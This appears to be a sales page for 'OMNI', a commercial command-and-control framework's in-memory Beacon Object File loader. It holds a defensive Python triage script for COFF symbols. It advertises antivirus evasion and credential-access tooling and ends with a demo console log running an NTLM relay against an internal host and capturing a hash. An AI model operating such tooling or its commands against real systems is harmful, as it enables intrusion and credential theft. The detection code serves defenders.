Beacon Object Files: In-Memory Post-Exploitation, Zero Disk Writes
BOFs execute as COFF x86_64 objects loaded directly into the agent process: nothing touches disk, no new process is spawned, and there is no PE file on disk for AV signatures to match. OMNI ships 105+ TrustedSec BOFs pre-loaded, covering credential access, host enumeration, lateral movement, and defence evasion. Custom BOFs can be uploaded and queued from the Web UI without server access.
Technical Specifications
- Full COFF x86_64 parser and loader
- Module stomping + double-map execution
- Full Beacon API compatibility
- No disk writes, no new process spawned
- Custom BOF upload via Web UI drag-and-drop
- Output captured and displayed in session panel
- Runs in agent memory space — no injected thread
- Compatible with all TrustedSec public BOFs
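Because a BOF is an ordinary COFF object, its symbol table gives defenders a static triage signal for object files recovered from a staging directory, a network capture or a memory image. The following is an added example, not OMNI or TrustedSec code: it parses an x86_64 COFF header and symbol table and flags the public BOF conventions (a `go` entry point and unresolved `__imp_Beacon*` or `__imp_LIBRARY$Function` imports). The function names and the sample object are constructed for illustration.

```python
import struct

AMD64 = 0x8664                    # IMAGE_FILE_MACHINE_AMD64
HDR = struct.Struct("<HHIIIHH")   # COFF file header (20 bytes)
SYM = struct.Struct("<8sIhHBB")   # COFF symbol record (18 bytes)

def coff_symbols(data):
    """Yield (name, section_number, storage_class) for each primary symbol."""
    if len(data) < HDR.size:
        raise ValueError("too short for a COFF header")
    machine, _, _, symtab, nsyms, _, _ = HDR.unpack_from(data, 0)
    strtab = symtab + nsyms * SYM.size          # string table follows the symbols
    if machine != AMD64 or symtab == 0 or strtab + 4 > len(data):
        raise ValueError("not an x86_64 COFF object with a symbol table")
    i = 0
    while i < nsyms:
        raw, _, section, _, storage, naux = SYM.unpack_from(data, symtab + i * SYM.size)
        name = raw.rstrip(b"\0")                # short name stored inline
        if raw[:4] == b"\0\0\0\0":              # long name: offset into string table
            start = strtab + struct.unpack("<I", raw[4:])[0]
            end = data.find(b"\0", start)
            name = data[start:end] if end > 0 else b""
        yield name.decode("ascii", "replace"), section, storage
        i += 1 + naux                           # skip auxiliary records

def triage(data):
    """Report BOF conventions: a defined go() plus unresolved __imp_ imports."""
    rep = {"entry_go": False, "beacon_api": [], "dynamic_imports": []}
    for name, section, storage in coff_symbols(data):
        undefined = storage == 2 and section == 0   # external and unresolved
        if name == "go" and storage == 2 and section > 0:
            rep["entry_go"] = True
        elif undefined and name.startswith("__imp_Beacon"):
            rep["beacon_api"].append(name[6:])
        elif undefined and name.startswith("__imp_") and "$" in name:
            rep["dynamic_imports"].append(name[6:])   # LIBRARY$Function form
    rep["likely_bof"] = rep["entry_go"] and bool(rep["beacon_api"] or rep["dynamic_imports"])
    return rep

def build_sample():
    """Constructed object for the demo: header, empty .text header, 3 symbols."""
    strtab, syms = b"", b""
    for name, sec in [(b"go", 1), (b"__imp_BeaconPrintf", 0), (b"__imp_KERNEL32$GetLastError", 0)]:
        field = name.ljust(8, b"\0")
        if len(name) > 8:                       # long names live in the string table
            field = struct.pack("<II", 0, 4 + len(strtab))
            strtab += name + b"\0"
        syms += SYM.pack(field, 0, sec, 0x20 if sec else 0, 2, 0)
    hdr = HDR.pack(AMD64, 1, 0, HDR.size + 40, 3, 0, 0)   # symbols follow one section header
    return hdr + b".text".ljust(40, b"\0") + syms + struct.pack("<I", 4 + len(strtab)) + strtab
```

A hit from `triage()` is a lead rather than a verdict: symbol names are trivial to change, so pair it with memory and behavioural telemetry.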
Use BOF Loader in your next engagement
Included in all OMNI plans — from $200/mo. 7-day money-back guarantee.
[*] Waiting for bof response (Timeout: 60s)...
[+] Response from CORP-WS-042:
UserName : CORP\jsmith
Domain : CORP
LogonType : Interactive
Groups : Domain Users, Remote Desktop Users, Developers
Privileges : SeChangeNotifyPrivilege, SeUndockPrivilege
└─ Saved: exfiltrated/CORP-WS-042/demo/bof/whoami_[demo].txt
[+] Command completed successfully
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof upload --path /opt/omni/bof/custom/ntlm_relay.x64.o
[*] Uploading custom BOF: ntlm_relay.x64.o (18.4 KB)...
[+] BOF uploaded and registered successfully
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof ntlm_relay.x64 --target 10.10.20.5 --port 445
[*] Executing BOF in beacon thread (in-process)...
[+] NTLM relay listener started on port 8445
[+] Waiting for authentication events...
[!] NTLMv2 hash captured: CORP\svc_sql::CORP:[demo-hash-omitted]
[+] Command completed successfully